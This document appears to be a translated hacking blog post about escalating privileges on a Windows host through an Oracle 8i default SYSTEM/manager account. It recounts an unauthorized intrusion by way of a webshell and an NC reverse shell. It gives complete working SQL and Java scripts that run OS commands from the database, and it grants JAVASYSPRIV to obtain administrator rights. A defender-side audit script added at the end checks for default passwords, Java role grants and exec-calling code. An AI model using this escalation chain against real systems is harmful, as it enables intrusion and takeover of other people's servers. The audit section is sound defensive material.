In Oracle databases, privileges can also be escalated through the Oracle default account. The following describes an example of privilege escalation through the Oracle default account; we hope it gives you some insight into database security.
Recently I visited a host. The host was configured fairly securely, but an .asp file had been left in a relatively hidden directory, so a webshell was obtained easily.
Then I looked around on the host, uploaded SuperScan and scanned it: only port 80 was open. In the user's Program directory there was a shortcut, firecontrol, which looked like a hardware firewall console. Checking the running services through the webshell, I found that the usual privilege escalation methods would not work: there was no Serv-U and so on, and the host had the latest patches installed. I uploaded an NC and got a shell through a reverse connection, which is much more comfortable than working in the veteran manager.
On drive C there is a directory named oracle, and the file C:\oracle\ora81\network\ADMIN\tnsnames.ora confirms the host's service name "xxx"; the version is Oracle 8i. Using the database connection string Provider=MSDAORA.1;Password=manager;User ID=system;Data Source=xxxx, I tried the default system account with the default password manager, and it really did connect to the local Oracle service.
Now, the default Oracle account is like sa in MSSQL: we can use this account to escalate privileges. Write the following scripts:
1. (1.sql) A Java source that runs an OS command and echoes its output:

```sql
create or replace and compile java source named "Util" as
import java.io.*;
import java.lang.*;

public class Util extends Object
{
  // Runs the given command line and returns the process exit code.
  public static int RunThis(String args)
  {
    Runtime rt = Runtime.getRuntime();
    int rc = -1;
    try
    {
      Process p = rt.exec(args);
      int bufSize = 4096;
      BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufSize);
      int len;
      byte buffer[] = new byte[bufSize];
      // Echo back what the program spit out
      while ((len = bis.read(buffer, 0, bufSize)) != -1)
        System.out.write(buffer, 0, len);
      rc = p.waitFor();
    }
    catch (Exception e)
    {
      e.printStackTrace();
      rc = -1;
    }
    finally
    {
      return rc;
    }
  }
}
/
```

2. (2.sql) A PL/SQL call specification that wraps the Java method:

```sql
create or replace function RUN_CMD(p_cmd in varchar2) return number
as language java
name 'Util.RunThis(java.lang.String) return integer';
/
```

3. (3.sql) A procedure that calls the function:

```sql
create or replace procedure RC(p_cmd in varchar2)
as
  x number;
begin
  x := run_cmd(p_cmd);
end;
/
```
Save them as 1.sql, 2.sql and 3.sql in C:\, run sqlplus system/manager@xxx from the reverse-connection shell, and then run the scripts:

```
SQL> @C:\1.sql
SQL> @C:\2.sql
SQL> @C:\3.sql
```

SQL*Plus reports that the Java source, the function and the procedure have been created. Then we continue:

```
SQL> variable x number;
SQL> set serveroutput on
SQL> exec dbms_java.set_output(100000);
SQL> grant javasyspriv to system;
```
Now we can execute system commands. First I want to add asp.dll to the InProcessIsapiApps list:

```
SQL> exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll"');
```

The procedure completes successfully. Logging back in to our webshell, it now has administrator privileges, and a shell returned through NC likewise runs with administrator privileges; we can do what we want. Because the host's firewall filters every port except 80, setting up a graphical backdoor is difficult, so we are left with a privileged webshell. The privilege escalation is complete.
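From the defender's side, the whole chain above rests on three conditions a DBA can check for: an account still using its vendor default password, a grantee of JAVASYSPRIV (or JAVAUSERPRIV), and stored Java code or PL/SQL call specifications that reach Runtime.exec. The audit script below is an added example and is not part of the original post; it assumes Oracle 11g or later (DBA_USERS_WITH_DEFPWD does not exist in 8i) and a session that can read the DBA_* views and issue AUDIT statements.

```sql
-- Added defender-side audit (not from the original post). Assumes Oracle 11g+
-- for DBA_USERS_WITH_DEFPWD and a session with SELECT on the DBA_* views.

-- 1. Accounts whose password is still the vendor default (e.g. SYSTEM/MANAGER).
SELECT d.username, u.account_status
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 ORDER BY d.username;

-- 2. Who holds the roles that let Java stored code run OS commands.
SELECT grantee, granted_role, admin_option
  FROM dba_role_privs
 WHERE granted_role IN ('JAVASYSPRIV', 'JAVAUSERPRIV')
 ORDER BY grantee;

-- 3. Stored Java sources that obtain a Runtime or call exec().
SELECT DISTINCT owner, name
  FROM dba_source
 WHERE type = 'JAVA SOURCE'
   AND (UPPER(text) LIKE '%GETRUNTIME%' OR UPPER(text) LIKE '%.EXEC(%');

-- 4. PL/SQL wrappers that hand control to Java (call specifications like RUN_CMD).
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE type IN ('FUNCTION', 'PROCEDURE', 'PACKAGE BODY')
   AND UPPER(text) LIKE '%LANGUAGE JAVA%';

-- 5. Java objects owned by schemas other than the Oracle-maintained ones.
SELECT owner, object_type, COUNT(*) AS objects
  FROM dba_objects
 WHERE object_type IN ('JAVA SOURCE', 'JAVA CLASS')
   AND owner NOT IN ('SYS', 'SYSTEM', 'MDSYS', 'ORDSYS', 'XDB')
 GROUP BY owner, object_type
 ORDER BY owner, object_type;

-- 6. Record future object creation, privilege grants and logons so that
--    activity like 1.sql/2.sql/3.sql and "grant javasyspriv" leaves a trail.
AUDIT PROCEDURE BY ACCESS;
AUDIT SYSTEM GRANT BY ACCESS;
AUDIT SESSION;
```

Any row returned by queries 1 to 4 deserves a follow-up: change or lock the default account, revoke the Java role from accounts that do not need it, and review who created the Java source and the call specification. Query 5 is a baseline rather than a finding; compare it against the previous run to spot newly appeared Java objects.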